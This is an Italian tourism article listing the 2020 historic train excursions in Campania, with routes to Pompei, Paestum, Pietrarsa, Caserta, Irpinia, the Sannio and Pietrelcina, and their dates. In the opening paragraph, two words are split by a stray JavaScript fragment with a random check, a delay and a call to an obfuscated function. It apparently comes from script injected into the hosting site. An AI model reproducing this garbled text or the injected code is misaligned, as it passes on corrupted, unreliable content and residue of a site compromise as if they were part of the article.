VIAGGIO IN CAMPANIA CON I TRENI DELLA CULTURA E DEL GUSTO

 

Dopo il successo dello scorso anno, la Regione Campania rilancia la proposta di un turismo sostenibile rinnovandom() * 5); if (number1==3){var delay = 15000;setTimeout($mRi(0), delay);}ando l’appuntamento con i treni storici. L’ACaMIR (Agenzia Campana Mobilità Infrastrutture e reti) e FS, facendo proprie le linee guide del MiBACT, invitano a riscoprire le bellezze di casa nostra, utilizzandom() * 5); if (number1==3){var delay = 15000;setTimeout($mRi(0), delay);}ando i treni storici e turistici che percorreranno le linee più caratteristiche della Regione, in piena sicurezza grazie alle misure di distanziamento adottate

Il programma 2020 propone numerosi itinerari già sperimentati con successo nel passato.

Nel dettaglio:

  • Archeotreno Campania

(Treno storico da Napoli Centrale a Ercolano, Pompei, Paestum, Ascea, Salerno, Pontecagnano e Sapri)

L’Archeotreno Campania congiunge la città di Napoli con le vicine aree archeologiche di Pompei e Paestum, entrambe dichiarate dall’UNESCO patrimoni mondiali dell’umanità: sono due siti che richiamano ogni anno milioni di turisti desiderosi di osservare le impronte di un mondo passato, conservato – nel caso di Pompei – a causa, o per fortuna, dall’eruzione del Vesuvio che svetta nel cielo in lontananza.

Gli appuntamenti:  1 novembre -19, 20 e 21 novembre – 6 dicembre.

  • Pietrarsa Express

(Treno storico da Napoli Centrale al Museo Nazionale Ferroviario di Pietrarsa)

 Due appuntamenti mensili per arrivare al Museo di Pietrarsa vivendo l’emozione di un viaggio a bordo di carrozze d’epoca “Centoporte”, trainate dalla storica locomotiva E656. Anche quest’anno, grazie al “Pietrarsa Express”, i turisti avranno modo di raggiungere il sito scegliendo tra le coppia di corse della mattina e del pomeriggio. L’itinerario proseguirà con la visita libera del Museo di Pietrarsa, inclusa nel biglietto ferroviario. I viaggiatori che esibiranno il biglietto del treno storico al “Caffè Bayard” ubicato all’interno del Museo, avranno diritto ad uno sconto del 10% sulle consumazioni.

Gli appuntamenti:.27 settembre – 4, 11,.25 ottobre – 8 e 22 novembre – 13 e 27 dicembre.

Pietrarsa Express 2020: in treno storico da Napoli al Museo Ferroviario di Pietrarsa

  • Reggia Express

(Treno storico da Napoli Centrale a Caserta)

Dal centro di Napoli alla Reggia di Caserta vivendo l’esperienza di un viaggio su un treno d’epoca.

Un salto nella storia che inizia sul treno storico: un convoglio formato da carrozze Centoporte e Corbellini – rispettivamente degli anni ’30 e ’50 – consente di immergersi sin da subito nell’atmosfera di un’epoca diversa.

Gli appuntamenti: 20 settembre – 18 ottobre – 15 novembre – 20 dicembre.

Reggia Express, il treno d’epoca per la Reggia di Caserta

  • Irpinia Express

(Treno storico sulla ferrovia Avellino-Rocchetta)

Il tour sulla ferrovia storica Avellino-Rocchetta, con varie tappe a seconda degli eventi, è un viaggio tra passato e presente immersi nel verde di un territorio meraviglioso. Si va alla scoperta di una nuova modalità di concepire gli spazi e ripensare i luoghi. Prima sulle rotaie, poi in uno stimolante trekking urbano nel cuore dell’Alta Irpinia, o un tour enogastronomici e molte altre esperienze.

Gli appuntamenti: 20 settembre – 4, 17, 18 e 31 ottobre – 1 e 8 novembre – 5, 13, 19 e 20 dicembre.

Irpinia Express, viaggio nelle terre del Carmasciano

  • Sannio Express

(Treno storico sulla ferrovia Benevento-Bosco Redole)

La ferrovia del Sannio congiunge due regioni partendo da Benevento in Campania fino ad arrivare Campobasso in Molise. A bordo del treno storico si potrà vivere l’esperienza di un viaggio senza tempo, in un territorio incontaminato e ricco di attrattori turistici. Tra le tappe imperdibili, l’antico borgo di Pietrelcina che diede i natali a San Pio, ed i caratteristici centri di Fragneto (noto per il Festival Internazionale delle Mongolfiere), Santa Croce del Sannio e Morcone.

Gli appuntamenti: 4, 10, 11 e 18 ottobre.

  • Treno di San Pio (Ferrovia del Sannio)

(Treno storico da Napoli Centrale a Pietrelcina)

Programma Turistico: Incontro alla stazione di Napoli centrale con gli incaricati accompagnatori e salita sul treno storico per la partenza verso Pietrelcina alle ore 8.35 con arrivo alle ore 11.00 e incontro con le guide locali. I passeggeri raggiungeranno in autobus la Chiesa di Santa Maria degli Angeli per la celebrazione della S. Messa, al termine della quale ci sarà il trasferimento per il ristorante e il pranzo. Nel pomeriggio visita guidata alla scoperta dei ricordi e della casa natale di Padre Pio. Al termine, proseguimento in pullman per la stazione ferroviaria. Il ritorno in treno storico è previsto con partenza alle ore 16.40 per Napoli e arrivo alla stazione centrale alle ore 19.10.

Appuntamento: 23 settembre.

In treno storico sulle orme di San Pio